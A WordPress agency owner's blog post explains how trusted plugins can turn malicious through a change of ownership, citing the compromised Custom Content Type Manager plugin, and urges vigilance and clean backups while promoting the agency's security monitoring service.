Even Good WordPress Plugins Can Become Malicious

A criminal wearing a maskYou go to all the trouble of finding high quality plugins from reputable authors (or from the WordPress plugin repository) for your website and suddenly you find you’ve been hacked.

“How can it be?” you ask yourself.

One possible reason is that, somehow, that carefully chosen ‘good’ plugin has gone bad.

Let’s look at some reasons that good plugins go bad:

How do ‘good’ plugins go bad?

I’ve linked to an article at the end of this that goes into explicit detail. It’s long and reasonably technical reading, especially if you’re not into the technical stuff – so here’s the translation:

Basically good plugins can go bad for 2 reasons:

  1. The plugin author sells (or gives away) his plugin and a bad guy gets hold of it
  2. A bad guy gets his name added as an owner of the plugin in the WordPress repository, which enables him to edit it

Once the malicious code is added to the plugin a new version is created. This prompts a plugin ‘update available’ notification to site owners who load the malicious code onto their website with the new version.

In the incident referred to in the article I’ve linked to below, the compromised plugin (Custom Content Type Manager) sent information about the site and its users back to the server of the hacker, and it created a backdoor to the site.

And, as site owners running the CCTM plugin updated it, the hacker built up a list of compromised sites that he could exploit.

Most of the rest of that article traces the investigation they went through at Sucuri to identify the hack and the hacker, so if you’re curious you can get all the details there (link is below).


As is always the case in any area of security enforcement, the hackers are always one step ahead (many years ago I managed the credit authorisation operation for American Express in the UK, and I learnt then that the bad guys are always one step ahead!).

So you cannot relax your vigilance.

Certainly you should only install plugins from reputable authors or from the WordPress repository but, since even these can go bad, you must keep a current, clean backup of your entire website.

The surest and quickest way of repairing a hacked website is to delete it entirely and restore it from a clean backup.

I receive notifications of new security risks affecting WordPress websites each day from two sources – Sucuri and the WPScan Vulnerability Database – so Abledragon is able to react very quickly if a problem is found which affects your website. Details of our security monitoring service can be found here.

The full article setting out the details I’ve referred to above can be found here – click here.

And if you have any questions about security on WordPress websites please get in touch – to do so:

Stay vigilant!

Martin Malden

About the author: Martin Malden owns Abledragon, a WordPress agency that was established in 2009. Today it serves customers in Hong Kong, Australia and the UK. Abledragon websites are built for today’s Internet, with the mobile user in mind, and are known for security and speed. Successful Abledragon projects.